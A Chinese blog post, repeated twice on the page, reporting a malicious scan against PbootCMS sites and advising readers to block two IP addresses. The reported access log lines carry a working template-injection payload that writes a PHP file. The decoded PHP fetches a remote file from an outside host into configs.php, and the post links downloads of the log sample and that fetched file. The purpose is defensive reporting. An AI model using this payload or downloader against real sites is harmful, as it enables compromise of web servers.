发现一个扫描pbootcms漏洞的样本
时间:2024年04月03日
编辑:佚名
是通过python爬取网站是不是有漏洞样本,扫描的ip是香港的。
样本如下:
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=1 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=2 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=3 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=4 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=5 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=6 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=7 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=8 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=9 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=10 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=11 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=12 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=13 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=14 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=15 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=16 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=17 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=18 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=19 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=20 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:15 +0800] "GET /aasaa.php HTTP/1.1" 403 146 "-" "python-requests/2.31.0"
其中base64解密内容为:
<?php
file_put_contents('configs.php',file_get_contents('http://ma.hth01.cc/dd.txt'));
echo 'hs11888';
unlink(__FILE__);
把两个恶意脚本的ip屏蔽掉
154.89.4.7
154.213.17.132
恶意扫描pbootcms漏洞样本.txt
链接: https://pan.baidu.com/s/1fa__G9QakFfy5Didl_ax8w 提取码: krcu
恶意代码调用的文件dd.txt
链接: https://pan.baidu.com/s/1cWwZJVMtmYFatuShxV3GPQ 提取码: xvfh
样本如下:
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=1 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=2 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=3 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:11 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=4 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=5 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=6 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=7 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=8 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=9 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:12 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=10 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=11 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=12 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=13 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=14 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:13 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=15 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=16 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=17 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=18 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=19 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:14 +0800] "GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22aasaa.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCdjb25maWdzLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9tYS5odGgwMS5jYy9kZC50eHQnKSk7CmVjaG8gJ2hzMTE4ODgnOwp1bmxpbmsoX19GSUxFX18pOw==\x22)))}{/pboot:if}/../../?p=20 HTTP/1.1" 403 146 "-" "Python-urllib/3.12"
154.89.4.7 - - [03/Apr/2024:07:30:15 +0800] "GET /aasaa.php HTTP/1.1" 403 146 "-" "python-requests/2.31.0"
其中base64解密内容为:
<?php
file_put_contents('configs.php',file_get_contents('http://ma.hth01.cc/dd.txt'));
echo 'hs11888';
unlink(__FILE__);
把两个恶意脚本的ip屏蔽掉
154.89.4.7
154.213.17.132
恶意扫描pbootcms漏洞样本.txt
链接: https://pan.baidu.com/s/1fa__G9QakFfy5Didl_ax8w 提取码: krcu
恶意代码调用的文件dd.txt
链接: https://pan.baidu.com/s/1cWwZJVMtmYFatuShxV3GPQ 提取码: xvfh
相关文章
猜你需要
